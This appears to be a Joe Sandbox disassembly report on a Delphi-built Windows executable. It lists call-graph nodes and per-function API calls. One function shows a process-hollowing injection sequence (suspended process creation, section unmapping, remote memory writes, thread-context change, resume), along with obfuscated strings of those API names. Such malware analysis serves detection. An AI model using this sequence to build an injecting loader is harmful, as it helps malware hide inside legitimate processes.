604ddc 4 API calls 5571->5572 5573 60298c CharToOemA 5572->5573 5574 605fb0 5573->5574 5574->5558 5576 602a38 5575->5576 5577 602a6d 5576->5577 5578 6029a4 4 API calls 5576->5578 5577->5571 5578->5577 5737 601ba1 5738 601b7e 5737->5738 5739 601b91 RtlDeleteCriticalSection 5738->5739 5740 601b87 RtlLeaveCriticalSection 5738->5740 5740->5739 5579 605f28 5580 605f3e GetDiskFreeSpaceA 5579->5580 5582 605f83 5580->5582 5587 603b2c 5588 603b45 5587->5588 5589 603b4e 5587->5589 5590 6039ec 11 API calls 5588->5590 5591 603b81 5589->5591 5602 603b0c WideCharToMultiByte 5589->5602 5592 603b4c 5590->5592 5594 603e84 25 API calls 5591->5594 5596 603b8e 5594->5596 5595 603b6c 5595->5591 5597 603b72 5595->5597 5603 603b0c WideCharToMultiByte 5596->5603 5599 603adc 25 API calls 5597->5599 5599->5592 5600 603b9c 5601 603e84 25 API calls 5600->5601 
5601->5592 5602->5595 5603->5600 5608 607532 5609 607534 5608->5609 5610 607569 5609->5610 5611 60755d 5609->5611 5612 607567 5610->5612 5613 604b70 56 API calls 5610->5613 5614 603a84 11 API calls 5611->5614 5615 604b70 56 API calls 5612->5615 5613->5612 5614->5612 5616 6075a1 5615->5616 5617 6072e4 56 API calls 5616->5617 5618 6075b0 5617->5618 5619 6039ec 11 API calls 5618->5619 5620 6075c7 5619->5620 5621 6039ec 11 API calls 5620->5621 5622 6075cf 5621->5622 5016 604c33 5017 604c25 5016->5017 5018 6039ec 11 API calls 5017->5018 5019 604c2d 5018->5019 5761 6027b4 5762 6027c9 5761->5762 5763 6027ce 5761->5763 5766 6019d0 4 API calls 5762->5766 5764 6027f3 RtlEnterCriticalSection 5763->5764 5765 6027fd 5763->5765 5768 6027d2 5763->5768 5764->5765 5776 6025b0 5765->5776 5766->5763 5769 60280a 5772 602862 RtlLeaveCriticalSection 5769->5772 5773 60286c 5769->5773 5771 60222c 14 API calls 5774 602816 5771->5774 5772->5773 5774->5769 5786 6023d8 5774->5786 5777 6025c4 5776->5777 5778 6025f6 5777->5778 5779 602686 5777->5779 5780 6025e7 5777->5780 5778->5780 5783 601cbc 9 API calls 5778->5783 5779->5780 5781 601f74 9 API calls 5779->5781 5782 602721 5779->5782 5800 602078 5779->5800 5780->5769 5780->5771 5781->5779 5782->5780 5785 601e7c 9 API calls 5782->5785 5783->5780 5785->5780 5787 6023f6 5786->5787 5788 6023f1 5786->5788 5789 602431 5787->5789 5790 602427 RtlEnterCriticalSection 5787->5790 5797 6023fa 5787->5797 5791 6019d0 4 API calls 5788->5791 5792 6024dd 5789->5792 5796 602447 5789->5796 5798 602509 5789->5798 5790->5789 5791->5787 5795 601f74 7 API calls 5792->5795 5792->5797 5793 602594 RtlLeaveCriticalSection 5794 60259e 5793->5794 5794->5769 5795->5797 5796->5793 5796->5794 5797->5769 5798->5796 5799 601e7c 7 API calls 5798->5799 5799->5796 5805 6017f8 5800->5805 5802 60208d 5803 601fc0 9 API calls 5802->5803 5804 60209a 5802->5804 5803->5804 5804->5779 5806 60181b 5805->5806 5807 601494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5806->5807 5808 
6018e1 5806->5808 5809 6012e4 LocalAlloc 5806->5809 5811 6018c7 5806->5811 5813 60187c 5806->5813 5807->5806 5810 6015d4 VirtualAlloc 5808->5810 5814 60188d 5808->5814 5809->5806 5810->5814 5812 60150c VirtualFree 5811->5812 5812->5814 5815 60150c VirtualFree 5813->5815 5814->5802 5815->5814 5020 607436 5021 60743a 5020->5021 5022 60743f 5020->5022 5024 603004 5021->5024 5029 603094 5024->5029 5027 6028b0 11 API calls 5028 603015 5027->5028 5028->5022 5030 60309a 5029->5030 5031 603f50 13 API calls 5030->5031 5032 60300e 5030->5032 5031->5030 5032->5027 5627 60373a 5628 60373f 5627->5628 5629 60344c 4 API calls 5628->5629 5630 603744 5629->5630 5631 603749 5630->5631 5632 6034a0 4 API calls 5630->5632 5632->5631 5816 6085ba 5818 6085c4 5816->5818 5817 60872b 5818->5817 5819 60825c 11 API calls 5818->5819 5820 6085f0 5819->5820 5821 603f9c 13 API calls 5820->5821 5822 60860a 5821->5822 5823 603f9c 13 API calls 5822->5823 5824 60861f 5823->5824 5825 603f9c 13 API calls 5824->5825 5826 608634 5825->5826 5827 6039ec 11 API calls 5826->5827 5828 60863e 5827->5828 5829 6044b4 13 API calls 5828->5829 5830 60864e 5829->5830 5831 6044b4 13 API calls 5830->5831 5832 60865e 5831->5832 5833 603f9c 13 API calls 5832->5833 5834 608673 5833->5834 5835 603f9c 13 API calls 5834->5835 5836 608688 5835->5836 5837 603f9c 13 API calls 5836->5837 5838 60869d 5837->5838 5839 603f9c 13 API calls 5838->5839 5840 6086b2 5839->5840 5841 603f9c 13 API calls 5840->5841 5842 6086c7 5841->5842 5843 6039ec 11 API calls 5842->5843 5844 6086d1 5843->5844 5845 6039ec 11 API calls 5844->5845 5846 6086db 5845->5846 5847 6039ec 11 API calls 5846->5847 5848 6086e5 5847->5848 5849 6039ec 11 API calls 5848->5849 5850 6086ef 5849->5850 5851 6039ec 11 API calls 5850->5851 5852 6086f9 5851->5852 5853 6039ec 11 API calls 5852->5853 5854 608703 5853->5854 5855 6039ec 11 API calls 5854->5855 5856 60870d 5855->5856 5857 6039ec 11 API calls 5856->5857 5858 608717 5857->5858 5859 603ef0 SysFreeString 5858->5859 
5860 608721 5859->5860 5861 6039ec 11 API calls 5860->5861 5861->5817 5033 604c3c 5034 604c55 5033->5034 5035 604c78 5033->5035 5043 602a80 5034->5043 5038 602a80 4 API calls 5039 604c69 5038->5039 5040 602a80 4 API calls 5039->5040 5041 604c73 5040->5041 5050 601aa8 5041->5050 5044 602a90 5043->5044 5045 602abf 5043->5045 5044->5045 5048 602a96 5044->5048 5046 602abd 5045->5046 5047 6029a4 4 API calls 5045->5047 5046->5038 5047->5046 5048->5046 5062 6029a4 5048->5062 5051 601ba3 5050->5051 5052 601abb 5050->5052 5051->5035 5053 601ad2 RtlEnterCriticalSection 5052->5053 5054 601adc LocalFree 5052->5054 5053->5054 5055 601b1a 5054->5055 5056 601aff VirtualFree 5055->5056 5057 601b24 5055->5057 5056->5055 5058 601b50 LocalFree 5057->5058 5059 601b71 5057->5059 5058->5058 5058->5059 5060 601b91 RtlDeleteCriticalSection 5059->5060 5061 601b87 RtlLeaveCriticalSection 5059->5061 5060->5035 5061->5060 5063 604ddc 4 API calls 5062->5063 5064 6029ac 5063->5064 5064->5046 5065 60983c 5066 609855 5065->5066 5067 60985f 5065->5067 5068 6039ec 11 API calls 5066->5068 5068->5067 5862 6087bc 5863 608842 5862->5863 5864 6087ce 5862->5864 5865 608850 5863->5865 5866 6039ec 11 API calls 5863->5866 5864->5863 5875 6087d2 5864->5875 5868 609624 27 API calls 5865->5868 5866->5865 5867 608826 5870 608dd8 28 API calls 5867->5870 5869 608862 5868->5869 5871 609624 27 API calls 5869->5871 5872 608839 5870->5872 5873 608874 5871->5873 5874 608a40 GetPEB 5872->5874 5876 609624 27 API calls 5873->5876 5877 60883e 5874->5877 5875->5865 5875->5867 5875->5869 5908 608a50 GetPEB 5875->5908 5879 608886 5876->5879 5882 6039ec 11 API calls 5877->5882 5881 603a40 25 API calls 5879->5881 5880 60881d 5880->5867 5909 608a6c GetPEB 5880->5909 5883 608893 5881->5883 5882->5865 5885 605e3c 56 API calls 5883->5885 5886 60889b 5885->5886 5887 6088d2 5886->5887 5889 605d50 25 API calls 5886->5889 5892 609624 27 API calls 5886->5892 5894 603c68 25 API calls 5886->5894 5888 609624 27 API calls 5887->5888 5890 
6088e4 5888->5890 5889->5886 5891 605e3c 56 API calls 5890->5891 5906 6088ec 5891->5906 5892->5886 5893 60899f 5895 6044b4 13 API calls 5893->5895 5894->5886 5897 6089ba 5895->5897 5896 608a88 25 API calls 5896->5906 5898 603a10 11 API calls 5897->5898 5900 6089c7 5898->5900 5899 608b94 25 API calls 5899->5906 5901 603a84 11 API calls 5901->5906 5902 605e3c 56 API calls 5902->5906 5903 608c1c 25 API calls 5903->5906 5904 608cb8 25 API calls 5904->5906 5905 608eb4 29 API calls 5905->5906 5906->5893 5906->5896 5906->5899 5906->5901 5906->5902 5906->5903 5906->5904 5906->5905 5907 609014 42 API calls 5906->5907 5907->5906 5908->5880 5909->5867 5212 6074be 5213 6074f3 5212->5213 5214 6074ce 5212->5214 5223 607460 5213->5223 5214->5213 5215 6074f5 5214->5215 5217 607505 5214->5217 5219 6072a8 5217->5219 5220 6072af 5219->5220 5221 603a40 25 API calls 5220->5221 5222 6072c7 5221->5222 5222->5215 5231 6029b4 5223->5231 5226 607484 5228 6072a8 25 API calls 5226->5228 5227 607499 5229 6073a0 56 API calls 5227->5229 5230 607497 5228->5230 5229->5230 5230->5215 5232 604ddc 4 API calls 5231->5232 5233 6029ba 5232->5233 5234 604ddc 4 API calls 5233->5234 5235 6029c5 5234->5235 5235->5226 5235->5227 5236 6032be 5240 6033a1 5236->5240 5241 6032d1 5236->5241 5237 603344 5238 60335f UnhandledExceptionFilter 5237->5238 5243 603339 5237->5243 5238->5240 5238->5243 5239 604ddc 4 API calls 5239->5240 5241->5237 5241->5240 5242 603324 UnhandledExceptionFilter 5241->5242 5242->5240 5242->5243 5243->5239 5244 607884 5245 60785b 5244->5245 5246 6039ec 11 API calls 5245->5246 5247 607866 5246->5247 5248 603a10 11 API calls 5247->5248 5249 607876 5248->5249 5250 6039ec 11 API calls 5249->5250 5251 60787e 5250->5251 5910 603186 5911 603191 5910->5911 5912 60344c 4 API calls 5911->5912 5913 6031a4 5912->5913 5918 603588 5919 603599 5918->5919 5921 6035fa 5918->5921 5920 6035a2 UnhandledExceptionFilter 5919->5920 5922 6034e8 5919->5922 5920->5921 5920->5922 5922->5921 5923 602920 7 API calls 
5922->5923 5924 603584 5923->5924 5073 60760a 5076 607364 5073->5076 5075 60761e 5077 60736b 5076->5077 5078 604b70 56 API calls 5077->5078 5079 607383 5078->5079 5079->5075 5633 603b0a 5634 603b0c WideCharToMultiByte 5633->5634 5252 607890 5253 6078b5 5252->5253 5254 6078cc 5253->5254 5255 6078e3 5253->5255 5256 6078c6 5253->5256 5257 6072a8 25 API calls 5254->5257 5266 6076bc 5255->5266 5256->5254 5258 6078ee 5256->5258 5263 6078df 5257->5263 5260 604b70 56 API calls 5258->5260 5261 60790d 5260->5261 5291 6072e4 5261->5291 5264 6039ec 11 API calls 5263->5264 5265 60794a 5264->5265 5267 60770c 5266->5267 5268 6076fd 5266->5268 5270 604b70 56 API calls 5267->5270 5269 604b70 56 API calls 5268->5269 5271 60770a 5269->5271 5272 607719 VirtualQuery 5270->5272 5271->5272 5273 6077f1 5272->5273 5274 60773b GetModuleFileNameA 5272->5274 5275 604b70 56 API calls 5273->5275 5274->5273 5276 607758 5274->5276 5277 60783a 5275->5277 5299 605ef8 5276->5299 5278 6072e4 56 API calls 5277->5278 5287 6077ed 5278->5287 5281 604b70 56 API calls 5283 6077db 5281->5283 5282 6039ec 11 API calls 5284 607866 5282->5284 5285 6072e4 56 API calls 5283->5285 5286 603a10 11 API calls 5284->5286 5285->5287 5288 607876 5286->5288 5287->5282 5289 6039ec 11 API calls 5288->5289 5290 60787e 5289->5290 5290->5263 5292 6072f0 5291->5292 5293 6064bc 56 API calls 5292->5293 5294 60731d 5293->5294 5295 603a40 25 API calls 5294->5295 5296 607328 5295->5296 5297 6039ec 11 API calls 5296->5297 5298 60733d 5297->5298 5298->5263 5300 605f0b 5299->5300 5301 603e44 25 API calls 5300->5301 5302 605f1d 5301->5302 5302->5281 5303 604c91 5318 602ed4 GetKeyboardType 5303->5318 5306 604cd7 5308 604cdc GetCommandLineA 5306->5308 5326 601164 GetStartupInfoA 5308->5326 5311 604d49 GetThreadLocale 5315 604bc8 12 API calls 5311->5315 5312 604d1c GetVersion 5313 604d38 GetThreadLocale 5312->5313 5314 604d2c GetCurrentThreadId 5312->5314 5328 604bc8 GetLocaleInfoA 5313->5328 5315->5314 5319 602ee3 GetKeyboardType 
5318->5319 5320 602ef6 5318->5320 5319->5320 5320->5306 5321 602f04 RegOpenKeyExA 5320->5321 5322 602f7c 5321->5322 5323 602f2f RegQueryValueExA 5321->5323 5322->5306 5324 602f66 RegCloseKey 5323->5324 5324->5306 5327 60117a GetVersion 5326->5327 5327->5311 5327->5312 5329 604c03 5328->5329 5330 6039ec 11 API calls 5329->5330 5331 604c2d 5330->5331 5331->5314 5332 609492 CloseHandle CloseHandle 5333 6094af 5332->5333 5334 6034a0 4 API calls 5332->5334 5335 603a10 11 API calls 5333->5335 5334->5333 5336 6094cc 5335->5336 5337 6044b4 13 API calls 5336->5337 5338 6094da 5337->5338 5084 606e13 5085 6039ec 11 API calls 5084->5085 5086 606e3f GetThreadLocale 5085->5086 5103 606adc GetLocaleInfoA 5086->5103 5088 606e57 5089 606e70 5088->5089 5098 606ecf 5088->5098 5090 606ec1 5089->5090 5095 606e8c 5089->5095 5092 603a40 25 API calls 5090->5092 5091 606ebc 5094 603a10 11 API calls 5091->5094 5092->5091 5096 606fdd 5094->5096 5095->5091 5100 603bb8 25 API calls 5095->5100 5101 603c68 25 API calls 5095->5101 5097 603e44 25 API calls 5097->5098 5098->5091 5098->5097 5099 603c68 25 API calls 5098->5099 5102 603bb8 25 API calls 5098->5102 5109 607bb4 5098->5109 5099->5098 5100->5095 5101->5095 5102->5098 5104 606b03 5103->5104 5105 606b15 5103->5105 5106 603adc 25 API calls 5104->5106 5107 603a40 25 API calls 5105->5107 5108 606b13 5106->5108 5107->5108 5108->5088 5110 607bea 5109->5110 5111 607bc8 5109->5111 5110->5098 5111->5110 5113 607b94 5111->5113 5114 607ba0 CharNextA 5113->5114 5115 607baa 5113->5115 5114->5110 5115->5110 5339 601a9d 5340 601a84 5339->5340 5341 601a97 5340->5341 5342 601a8d RtlLeaveCriticalSection 5340->5342 5342->5341

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00609061
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00609089
                                                                    • Part of subcall function 00608D40: lstrcmp.KERNEL32(?,?), ref: 00608D95
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 006092D4
                                                                  • ReadProcessMemory.KERNELBASE(?,?,00000005,00000004,00000000), ref: 0060931D
                                                                    • Part of subcall function 00604F9C: CreateWindowExA.USER32 ref: 00604FD9
                                                                  • NtUnmapViewOfSection.NTDLL(?,00000005,00000000,?,00000000,00000000,000000FA,00000182,80000000,80000000), ref: 0060935F
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000004), ref: 0060937D
                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,00609905,?,00000000), ref: 0060939A
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00609905,?,?,?,00609905), ref: 00609411
                                                                  • VirtualProtectEx.KERNELBASE(?,?,?,00000040,?,?,00609905), ref: 00609431
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,00000000), ref: 00609453
                                                                  • Wow64SetThreadContext.KERNEL32(?,00010007), ref: 00609472
                                                                  • ResumeThread.KERNELBASE(?), ref: 0060947C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Memory$Write$CreateLibraryLoadThreadVirtual$AllocContextProtectReadResumeSectionUnmapViewWindowWow64lstrcmp
                                                                  • String ID: @qfbwfSql`fppB$D$DfwWkqfbg@lmwf{w$Hfqmfo01$MWGOO$MZ$PE$PfwWkqfbg@lmwf{w$QfbgSql`fppNfnlqz$QfpvnfWkqfbg$TqjwfSql`fppNfnlqz$UjqwvboBool`F{$UjqwvboSqlwf`wF{$first Window app$oloooool
                                                                  • API String ID: 2528929211-2128899875
                                                                  • Opcode ID: d87c723a2cb561c1242fafc6be16d314feaded0c2aac151016e52f6c516e272c
                                                                  • Instruction ID: 715b9aa7201df64e9751e330e1e9c19a6bf475734f272f1f24890eb41cefc1f1
                                                                  • Opcode Fuzzy Hash: d87c723a2cb561c1242fafc6be16d314feaded0c2aac151016e52f6c516e272c
                                                                  • Instruction Fuzzy Hash: 2BC10B71A402189FDB54EBA8CC85BDFB7BAEF48300F5040A9F649E72C1DA749E458F64

                                                                  Control-flow Graph

                                                                  control_flow_graph 98 6047b8-6047f8 GetModuleFileNameA RegOpenKeyExA 99 60483a-60487d call 6045e0 RegQueryValueExA 98->99 100 6047fa-604816 RegOpenKeyExA 98->100 107 6048a1-6048bb RegCloseKey 99->107 108 60487f-60489b RegQueryValueExA 99->108 100->99 101 604818-604834 RegOpenKeyExA 100->101 101->99 103 6048c3-6048f4 lstrcpyn GetThreadLocale GetLocaleInfoA 101->103 105 6049f3-6049f9 103->105 106 6048fa-6048fe 103->106 109 604900-604904 106->109 110 60490a-604921 lstrlen 106->110 108->107 111 60489d 108->111 109->105 109->110 113 604926-60492c 110->113 111->107 114 604939-604942 113->114 115 60492e-604937 113->115 114->105 116 604948-60494f 114->116 115->114 117 604923 115->117 118 604951-60497b lstrcpyn LoadLibraryExA 116->118 119 60497d-60497f 116->119 117->113 118->119 119->105 120 604981-604985 119->120 120->105 121 604987-6049bb lstrcpyn LoadLibraryExA 120->121 121->105 122 6049bd-6049f1 lstrcpyn LoadLibraryExA 121->122 122->105
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000), ref: 006047D3
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 006047F1
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0060480F
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0060482D
                                                                  • RegQueryValueExA.ADVAPI32 ref: 00604876
                                                                  • RegQueryValueExA.ADVAPI32 ref: 00604894
                                                                  • RegCloseKey.ADVAPI32(?), ref: 006048B6
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 006048D3
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 006048E0
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 006048E6
                                                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00604911
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00604966
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00604976
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 006049A2
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 006049B2
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 006049DC
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 006049EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1759228003-2375825460
                                                                  • Opcode ID: 3f75bca011fb74f87a44d5ef03a66c42f68c1ef6d93babe70a88f60babc03960
                                                                  • Instruction ID: 439e08d33a6fac8019160a22a772f9821e7e571ee344117f973a4ccba17bbda3
                                                                  • Opcode Fuzzy Hash: 3f75bca011fb74f87a44d5ef03a66c42f68c1ef6d93babe70a88f60babc03960
                                                                  • Instruction Fuzzy Hash: B26186B1E8424D7EEB29DAE4CC46FEFB7BD9B09300F4040A5B744E61C1DAB4DA458B54

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 006048D3
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 006048E0
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 006048E6
                                                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00604911
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00604966
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00604976
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 006049A2
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 006049B2
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 006049DC
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 006049EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1599918012-2375825460
                                                                  • Opcode ID: 4588dc4074c2392e32c2cdd69237c61b79bff1c8d06a6c5efebbf484b27bfb5e
                                                                  • Instruction ID: 2ea8edce084a28266abf1f81c2071a4b319a879fe6d4c62b47c76c420ca39287
                                                                  • Opcode Fuzzy Hash: 4588dc4074c2392e32c2cdd69237c61b79bff1c8d06a6c5efebbf484b27bfb5e
                                                                  • Instruction Fuzzy Hash: E13197B1E8424D7EDB69DAE8CC85FDFB7BE9B19300F0041A5A244E61C1DBB89E458B50

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00608E0A
                                                                    • Part of subcall function 00608D40: lstrcmp.KERNEL32(?,?), ref: 00608D95
                                                                  • OutputDebugStringA.KERNELBASE(that made me looool,00000000,00608E58,?,?,?,00000000,00000000,?,00608839,00000000,006089C8,?,?,?,00000005), ref: 00608E3B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: DebugLibraryLoadOutputStringlstrcmp
                                                                  • String ID: Hfqmfo01$LvwsvwGfavdPwqjmdB$that made me looool
                                                                  • API String ID: 1902896288-1512227557
                                                                  • Opcode ID: ac9e2763bc583bae6a6ae1e0cdd70218bde24cb25572d77f1616a3f6bdbf989c
                                                                  • Instruction ID: 91cfcea0a7c87a67f9c2548e482a2e6c48ff6f34df040ee4925186b5e68baebf
                                                                  • Opcode Fuzzy Hash: ac9e2763bc583bae6a6ae1e0cdd70218bde24cb25572d77f1616a3f6bdbf989c
                                                                  • Instruction Fuzzy Hash: BEF081307807146FE348EBA4CC12B5F7AAEDB85740F510478F580977C2DE749E008668

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • RtlInitializeCriticalSection.KERNEL32(0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 006019E7
                                                                  • RtlEnterCriticalSection.KERNEL32(0060B5C4,0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 006019FA
                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 00601A24
                                                                  • RtlLeaveCriticalSection.KERNEL32(0060B5C4,00601A9F,00000000,00601A98,?,?,?,006023F6), ref: 00601A92
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                  • String ID:
                                                                  • API String ID: 730355536-0
                                                                  • Opcode ID: d83a478d0fbd83e8168573bd93e1b4583d2a59f1f9abd21cdc0df2ac30b95189
                                                                  • Instruction ID: 74df882c1a01e5d4aec3e25528a86efcb18e16bd6ea950092898227c461be41d
                                                                  • Opcode Fuzzy Hash: d83a478d0fbd83e8168573bd93e1b4583d2a59f1f9abd21cdc0df2ac30b95189
                                                                  • Instruction Fuzzy Hash: 671160B0AC4241AFD75DEF99CC15B5BBBE3DB4A300F14E4A9A1009B3D1C7754D418B58

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
